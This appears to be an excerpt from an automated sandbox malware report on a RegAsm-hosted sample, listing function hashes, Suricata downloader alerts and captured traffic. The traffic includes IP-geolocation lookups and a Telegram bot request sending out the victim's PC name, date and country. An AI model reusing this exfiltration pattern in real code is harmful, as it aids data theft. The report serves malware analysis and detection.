Opcode Fuzzy Hash: 45fa1b2aec7d22d629d25d997d4bde104c27d3ae903212e0a806bcb8eda19624
Instruction Fuzzy Hash: DD41C131A0024ADFCF159F68C844BAABBF6EF84308F04806EE915DB252D779DD55CBA1

Function 013F5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 976bccda0ae5866b6803d1d0f8b5aa3b46f59a3d7bf96c52aa4f931cb6e511fa
Instruction ID: ea7155773a7c9508ade5f68427f237fa0753f8f61a3eda10da022f0fdc605bb6
Opcode Fuzzy Hash: 976bccda0ae5866b6803d1d0f8b5aa3b46f59a3d7bf96c52aa4f931cb6e511fa
Instruction Fuzzy Hash: DE31927170010AEFCF11AF68D854AAF3BB6FB48215F104429FA1597368DB39CD21CBA0

Function 013F8EF8 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2250187cb9aaf605b1007921e25fc642078aa64b4ab3728b700d43a084f5019a
Instruction ID: e94ded1b914b9162be110a43ee0a9841b7266f92b16866ff29541aca264e4018
Opcode Fuzzy Hash: 2250187cb9aaf605b1007921e25fc642078aa64b4ab3728b700d43a084f5019a
Instruction Fuzzy Hash: 893192303103118FDB2E8B69F85467E7B6BFB84618B1445EEE316CB692DB28CC848755

Function 013F2790 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb2d12625dcb285a7eb2873cbc706f80ea217e30997ac27a85947f6edae090d3
Instruction ID: ad738a3b3fef02008a0fd8fe4651d8a82e1c22c9bb2da1ce94140b8a4d396451
Opcode Fuzzy Hash: eb2d12625dcb285a7eb2873cbc706f80ea217e30997ac27a85947f6edae090d3
Instruction Fuzzy Hash: 2C313774D08349CFCB01DFA9D4546EEBFF9FB4A208F0401AAD644A7265EB345949CBA2

Function 013F8380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e68d7663f7773f40ad9b3dda930e6bff433cb55a96ad3a83477470c6073438da
Instruction ID: ea60a512c750ee166b7f06f032e833ec8b979a89b2364483475038d5fb67a698
Opcode Fuzzy Hash: e68d7663f7773f40ad9b3dda930e6bff433cb55a96ad3a83477470c6073438da
Instruction Fuzzy Hash: D721C2313002114BEF2A5A29C854B3E669BAFC475CF1480BDDE02DB7A9EE75CC429385

Function 013F62F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e8432e9a12603f5f5fce0db97e1894070ba496b6cee781f4cab6901e3685e39
Instruction ID: aa0a8bd7cbcb93c6c38f2d0e2677126774bfe15c0277e7219096d47c0e460b2f
Opcode Fuzzy Hash: 6e8432e9a12603f5f5fce0db97e1894070ba496b6cee781f4cab6901e3685e39
Instruction Fuzzy Hash: DA2126357045118FC7259A28C45492FBBA6FFC5759718407EEA06DB3B8CF31CC028B80

Function 013F28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8060f646c40909ab6703f2f639ce03bc23d5a1191bab04320225f6d9d9a021fa
Instruction ID: 1ae2ba4a5d5239e8f019c39130ba7f91c02b35be97c7ae4319a8ad0214a5bd65
Opcode Fuzzy Hash: 8060f646c40909ab6703f2f639ce03bc23d5a1191bab04320225f6d9d9a021fa
Instruction Fuzzy Hash: 7721A175A00106DFCB15DF28C840AAF7BA9EB9D2A4B10C15DD9099B344DB36EE42CBD1

Function 013AD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018486123.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13ad000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13eb6320882381b2d6c465cad879cb6827c7394e46fd33c4d39bb6d2a450615e
Instruction ID: 1f33e8b122f1363ae6bbca38e77c57147b0606c695b6cf3262265b6a8f9f2a8b
Opcode Fuzzy Hash: 13eb6320882381b2d6c465cad879cb6827c7394e46fd33c4d39bb6d2a450615e
Instruction Fuzzy Hash: E72134B1544304EFDB11CF64C9C4B26BBA5FB84318F60C96DE8494BA42C73AD447CB62

Function 013F5649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f8f51f168ac62dd8eee34d8b4a3484193808e6c138d17a63388d80bfc3888c4
Instruction ID: 5d51f7086dccf6a2829ef3aaf2ccb5556b58ac4a3b019e65e61ee72e86499472
Opcode Fuzzy Hash: 0f8f51f168ac62dd8eee34d8b4a3484193808e6c138d17a63388d80bfc3888c4
Instruction Fuzzy Hash: F121F3717052099FCF11AF28E444B6F3BB5FB55319F00802AEA159B369D739CD15CBA0

Function 013F4285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b01253717d7e4024467cab9da915ec7a1ba49e57f82055a43b519e3cc66533
Instruction ID: bf4e585b6f831b0310cab1223a22f755cfb963e2a1bc5d0e0864ede9e443c053
Opcode Fuzzy Hash: 32b01253717d7e4024467cab9da915ec7a1ba49e57f82055a43b519e3cc66533
Instruction Fuzzy Hash: E6318378E11249DFCB44DFA8E59489DBBB6FF49305B209469E819AB324D735AD01CF40

Function 013F9761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7a07f975d8e3e4182335c13391fe30d45a144d2e84e7e3ea8467f2c706bca17
Instruction ID: c20c172f0c6473f86a60ab5d336d32144cf0d451ab8f5a2677d2939179e16b97
Opcode Fuzzy Hash: a7a07f975d8e3e4182335c13391fe30d45a144d2e84e7e3ea8467f2c706bca17
Instruction Fuzzy Hash: A4219C70E01248EFDB15CFA5D590BEEBFBAEF48209F148069E515F62A4DB35D941CB20

Function 013FAEF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8940969f5cd714c68fac1fff7a480eb27ea6ec76ab40d7ca85b7fa346a79f1f
Instruction ID: 6592933630eb9dca89d5bd484910a6a663d148f3c7dfcc7c14c7e85090f05ef9
Opcode Fuzzy Hash: f8940969f5cd714c68fac1fff7a480eb27ea6ec76ab40d7ca85b7fa346a79f1f
Instruction Fuzzy Hash: 69118172B102089BCB148F58DC54BDDBBB6FB8C714F144029EA16A73A4DB71AC14CB90

Function 013FF312 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb285a31b61e149b8e86fe664fcb23463cdbbe443781f22055e1b9c76c7e8791
Instruction ID: be31717eeb526553f5bb6bb07dc6f0948488858b0ab75597ab403fbbacaf266a
Opcode Fuzzy Hash: cb285a31b61e149b8e86fe664fcb23463cdbbe443781f22055e1b9c76c7e8791
Instruction Fuzzy Hash: F0216D70A00209DFEB14EFA9D580B9EBFF6FB84305F1085A9C114AB254EB745E458B81

Function 013F6300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6692d686b1235c70587a8f3e38360efee74d6ddec0f226d20b6fc98994279d1
Instruction ID: 71ac00ac62323afd3cd38d05280af9ea9362c001fe99b528991cfc2cfca7d9fe
Opcode Fuzzy Hash: c6692d686b1235c70587a8f3e38360efee74d6ddec0f226d20b6fc98994279d1
Instruction Fuzzy Hash: 6D1104763016129FD7255A2EC46492EBBA6FFC5799308007DEA06CB374CF31DC028B90

Function 013F27F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3262c9834b37227f08baa30eba198c5478a4c7c32cc331b763a375b5067df8d7
Instruction ID: 530e48a513384c6eec9b2a5c09798566200968f6d6c691cb787be115299860cb
Opcode Fuzzy Hash: 3262c9834b37227f08baa30eba198c5478a4c7c32cc331b763a375b5067df8d7
Instruction Fuzzy Hash: 6B21EFB4D0420ACFCB10EFA9D8545EEBFF5BB4A204F10416AD915B2224EB305A89CBA1

Function 013FF320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5dc82966740af732b5407878b52c2d78004621e8034149ed7f9f88b2eea1338
Instruction ID: f4337a273f133e4b34485970e2e6269871846805d68cbd5dc9376d4fc9bf35d8
Opcode Fuzzy Hash: f5dc82966740af732b5407878b52c2d78004621e8034149ed7f9f88b2eea1338
Instruction Fuzzy Hash: 86111C70D00209DFDB14EFA9D580B9EBFF6FB84705F10C5A9C518AB254EB745E058B81

Function 013AD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018486123.00000000013AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13ad000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ca38e06ce5374078cbde1a7e0fc264fd270972ca1f75496724ff4700fc488e
Instruction ID: d36f8d09459cd8986b734d9a4777e72d95add09bba2d1392e1eee48e813fe9d4
Opcode Fuzzy Hash: 83ca38e06ce5374078cbde1a7e0fc264fd270972ca1f75496724ff4700fc488e
Instruction Fuzzy Hash: B811DD75504284CFCB12CF54C9C4B15BFA2FB84318F28CAADE8494BA52C33AD44ACF62

Function 013F5E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702cdca9767588f722df96c8e92d45b8c9baaab799cca7f7decd85cf409071bf
Instruction ID: 853cdb3127cb318f9fb85c88557278cf22c8f2e9f4eebcbbe5626593429af616
Opcode Fuzzy Hash: 702cdca9767588f722df96c8e92d45b8c9baaab799cca7f7decd85cf409071bf
Instruction Fuzzy Hash: E701F7327001196BCB119E5D9810BEF3BABFBD8650F19C02AFA15D7758DE35CC129790

Function 013FABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e3449f1b0c4696512284d6a5547b8831022cc632305704e39d94a05b11d1fb
Instruction ID: 7f316353312c4d4a05e74f86c3421e37f99829a0c002b04db8c5245db1fac3f6
Opcode Fuzzy Hash: a2e3449f1b0c4696512284d6a5547b8831022cc632305704e39d94a05b11d1fb
Instruction Fuzzy Hash: DCF096313106144BDB265A6ED454B2ABAEEEFC8A59359407DEB0DC7375EE21CC038790

Function 013FE8E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6482c4dcb690f088dee13162140e40aed54b24fda53003ef36f476c96d145d
Instruction ID: 2046664ba77417aa778168e571d283b7e4c10b9dc57ed4e573ef6c3344dbd280
Opcode Fuzzy Hash: be6482c4dcb690f088dee13162140e40aed54b24fda53003ef36f476c96d145d
Instruction Fuzzy Hash: A8011374E0020AEFDB00CFA8D844AAEBBB5FB89301F408469D914A3350D7395E56CF90

Function 013F28A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff946abc5daaef4a37677b7fa860147c7ea63879a81447fc9881f11b2f172fbd
Instruction ID: a670d6b7f0f8f3495594d9c043f5a9771298792955940e3a840efec2ae7fc0d4
Opcode Fuzzy Hash: ff946abc5daaef4a37677b7fa860147c7ea63879a81447fc9881f11b2f172fbd
Instruction Fuzzy Hash: 8BE02631E54366CACB01E7F09C040FEBB34ADC2122B08469BC062370A0EB302219C3A2

Function 013F28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cd3d3f6d5f182ac9c60e241103460b16357eab618f103361a3b8e22587041cf
Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
Opcode Fuzzy Hash: 7cd3d3f6d5f182ac9c60e241103460b16357eab618f103361a3b8e22587041cf
Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1

Function 013F6739 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa89aab409d0e0db0068e1df125c1700926d2b321b6eade91ff7c782ed2533f4
Instruction ID: bf2bd883fc9d13ccefc57ff3926abf2d19f743123cdd4a558752c0ab719b3699
Opcode Fuzzy Hash: fa89aab409d0e0db0068e1df125c1700926d2b321b6eade91ff7c782ed2533f4
Instruction Fuzzy Hash: D4D05E3220030657DB01FB79EC057993B6AFBD0916F44893090445AA69DF795C804661

Function 013FD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bd92f92b346f8478af13172e7b4f9143a8808c3f0858c147f46a9bad345b3a3
Instruction ID: 097a183c7997c4820722ba7c098e286a5f176bd714709bddb8b681a570cbbdd3
Opcode Fuzzy Hash: 4bd92f92b346f8478af13172e7b4f9143a8808c3f0858c147f46a9bad345b3a3
Instruction Fuzzy Hash: F6D04235E0514DCBCB30DFA8E4884DCBBB1FB89225B24542ADA29A3651D63454558F11

Function 013FAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9039941f0839d72268107e11ccf08ef2ac12d797938f508da42ca60a5e00d543
Instruction ID: caf3f957f661f5606894f7d381db26d20d06b1b86f9d4651d06e78486bb8e21d
Opcode Fuzzy Hash: 9039941f0839d72268107e11ccf08ef2ac12d797938f508da42ca60a5e00d543
Instruction Fuzzy Hash: 84D0673AB00008AFCB149F98EC409DDF7B6FB98221B448116E915A3264C6319965DB50

Function 013F6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc3df270b0fa9dbc6245e8f4d355ba76843032bf3cc3311800d4d65dbd4f1ad
Instruction ID: 1daf5e0f88f9a88359f81c3719e68864d1f8fcde6c42a7c09297728d43290f1e
Opcode Fuzzy Hash: efc3df270b0fa9dbc6245e8f4d355ba76843032bf3cc3311800d4d65dbd4f1ad
Instruction Fuzzy Hash: 6CC012310003095BDA11FB76EC44555377EF6D0916B40893090051957DDF7D5C454791

Non-executed Functions

Function 013FFA88 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee361e4a26a43f61631b7b0cbfb0c60b0711d67d573b18a3372b818424cd596
Instruction ID: 76da2f47073a79eab6f23df603939370c75689d5bd6f864678db413cee171b98
Opcode Fuzzy Hash: cee361e4a26a43f61631b7b0cbfb0c60b0711d67d573b18a3372b818424cd596
Instruction Fuzzy Hash: 77C1B175E00218CFEB14DFA9C984B9DBBB6BF89304F1080A9D909AB365DB355E85CF50

Function 013FF631 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb055ab5d8cc034f4d2ec97ec64b12616c31517996802eb48ea33b1334060e6
Instruction ID: c259c78a90ffcdbab320ab433dc11434791fa8e0ca6108746b3768f176146d34
Opcode Fuzzy Hash: 7fb055ab5d8cc034f4d2ec97ec64b12616c31517996802eb48ea33b1334060e6
Instruction Fuzzy Hash: 3CC1A075E00218CFEB14DFA9C944B9DBBB6BF89304F1080A9D809AB365DB359E85CF50

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2014/12/2024%20/%2016:26:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49704 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49711 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49717 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49719 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49727 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2014/12/2024%20/%2016:26:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
